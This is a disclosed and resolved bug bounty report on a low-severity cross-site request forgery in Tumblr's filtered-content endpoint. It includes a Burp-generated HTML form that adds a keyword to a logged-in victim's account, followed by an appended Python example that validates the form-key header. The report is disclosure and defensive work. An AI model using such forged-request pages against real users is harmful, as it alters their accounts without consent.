[tumblr.com] CSRF in /svc/user/filtered_content
Low
Vulnerability Details
## Summary:
Hello, I have found a cross-site request forgery in ```https://tumblr.com/svc/user/filtered_content``` that allows an attacker to add filtered content to a target/victim account.
The custom HTTP header ```X-tumblr-form-key``` used for CSRF protection is not validated.
## Steps To Reproduce:
1) Log into your Tumblr account in your current browser.
2) Open the poc.html, or manually copy the following code into an HTML file, open it in your current browser and click ```Submit request```.
```html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.tumblr.com/svc/user/filtered_content" method="POST">
<input type="hidden" name="filtered_content" value="pwd777" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
3) Go to https://www.tumblr.com/settings/account and you will see the keyword ```pwd777``` in your filtered content.
/!\ You can't add the same filtered content twice; this will generate a 400 HTTP response code /!\
You can follow along in the video PoC.
Thanks, good bye.
## Impact
Allows an attacker to add filtered content to a target/victim account.
Report Stats
- Report ID: 1010806
- State: Closed
- Substate: resolved
- Upvotes: 18
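For reference, a server-side check of the kind the report says was missing, written as an added example that is not part of the report and is not Tumblr's code. The HMAC-over-session derivation of the form key, the key value, the session IDs and the function names are all assumptions made for illustration.

```python
import hashlib
import hmac

# Constructed demo key (assumption); a real service loads this from a secret store.
SERVER_KEY = b"constructed-demo-key"
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}
HEADER = "x-tumblr-form-key"


def issue_form_key(session_id):
    """Derive the per-session key the site hands to its own pages (assumed scheme)."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def check_form_key(method, headers, session_id):
    """Return (status, reason) for a request before it reaches the handler."""
    if method.upper() not in STATE_CHANGING:
        return 200, "safe method"
    if not session_id:
        return 401, "no session"
    # Header names are case-insensitive, so normalise before the lookup.
    supplied = {k.lower(): v for k, v in headers.items()}.get(HEADER, "")
    expected = issue_form_key(session_id)
    # A missing, empty or wrong key is rejected. compare_digest keeps the
    # comparison constant-time so the key cannot be guessed byte by byte.
    if not supplied or not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403, "missing or invalid form key"
    return 200, "ok"


def demo():
    """Run the check over constructed requests to /svc/user/filtered_content."""
    sid = "sess-constructed-1"
    # A cross-site HTML form sends the victim's cookies but cannot set custom headers.
    form_post = {"Content-Type": "application/x-www-form-urlencoded"}
    # The site's own script reads the key from the page and sends it with the request.
    own_script = dict(form_post, **{"X-Tumblr-Form-Key": issue_form_key(sid)})
    # A key issued for a different session must not be accepted.
    other_key = dict(form_post, **{"X-Tumblr-Form-Key": issue_form_key("sess-other")})
    return {
        "form_post": check_form_key("POST", form_post, sid),
        "own_script": check_form_key("POST", own_script, sid),
        "other_key": check_form_key("POST", other_key, sid),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The check has to run before the handler on every state-changing route; a route that accepts the request when the header is absent is in the same position as the endpoint in this report.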